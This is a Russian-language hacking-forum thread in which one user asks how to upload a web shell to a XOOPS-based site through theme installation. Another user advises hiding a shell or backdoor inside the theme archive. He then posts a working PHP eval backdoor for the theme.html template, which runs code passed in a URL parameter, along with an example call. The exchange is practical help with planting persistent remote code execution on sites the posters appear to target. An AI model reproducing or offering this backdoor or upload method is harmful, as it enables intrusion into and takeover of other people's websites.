HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница

Ответ

Опции темы Поиск в этой теме Опции просмотра

Старый 31.12.2011, 14:07
flinster
Guest
Провел на форуме:
18455

Как можно залить шелл в xoops? Думаю единственная возможность через заливку шаблона.

Скачал шаблон для xoops, распаковал zip архив и через тотал командер упаковал в tar, но при заливке шаблона выдает ошибку что то типа отсутствует страуктура или типо того. Подскажите как можно залить шелл?

Старый 01.01.2012, 13:11
Ereee
Guest
Провел на форуме:
102354

Цитата:
Сообщение от flinster  
flinster said:
Как можно залить шелл в xoops? Думаю единственная возможность через заливку шаблона.
Скачал шаблон для xoops, распаковал zip архив и через тотал командер упаковал в tar, но при заливке шаблона выдает ошибку что то типа отсутствует страуктура или типо того. Подскажите как можно залить шелл?
Просто открой WinRar-ом шаблон, перекинь шелл в окно WinRar и залей. Можешь еще дописать любой файл из архива, оставив в нем бэкдор.

Старый 02.01.2012, 20:04
flinster
Guest
Провел на форуме:
18455

Цитата:
Сообщение от Ereee  
Ereee said:
Просто открой WinRar-ом шаблон, перекинь шелл в окно WinRar и залей. Можешь еще дописать любой файл из архива, оставив в нем бэкдор.
так и хочу сделать, но видимо вы не в курсе что можно закидывать архивы tar другие не канают

Старый 02.01.2012, 22:34
Ereee
Guest
Провел на форуме:
102354

Вообщем затея такая:

Идем в админку -> Модули -> Система -> Шаблоны -> Выбираем текущий шаблон -> theme.html.

В него можно вставить php-код между тегами echo "php";

Сейчас дальше соображу. Так как после вставки кода, у меня отказывает отображатся сайт.

--

UPD. Просто шаблон был кривой. Поставил другой шаблон, все нормально выполняется. Т.е. вставляешь в шаблон:

if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));

Вызываешь http://site.ltd/index.php?e=phpinfo();

Дальше все понятно. Кстати, не нашел где ты пытаешься залить .tar архив. Я движок скачал с сайта xoops2.ru, он?

Старый 03.01.2012, 01:54
flinster
Guest
Провел на форуме:
18455

Цитата:
Сообщение от None  
Кстати, не нашел где ты пытаешься залить .tar архив. Я движок скачал с сайта xoops2.ru, он?
все верно он самый. В установке шаблона есть возможность закачать, установить шаблон, просто если поменять расширение zip архива на tar то закачивает удачно но не устанавливается.

Цитата:
Сообщение от None  
Вообщем затея такая:
Идем в админку -> Модули -> Система -> Шаблоны -> Выбираем текущий шаблон -> theme.html.
В него можно вставить php-код между тегами echo "php";
Сейчас дальше соображу. Так как после вставки кода, у меня отказывает отображатся сайт.
спасибо большое хорошая затея, но мне к сожалению не покатит, нет прав на правку шаблона

Цитата:
Сообщение от None  
Файл должен иметь расширение tar.gz или .tar и принятую XOOPS структуру набора шаблонов

Ответ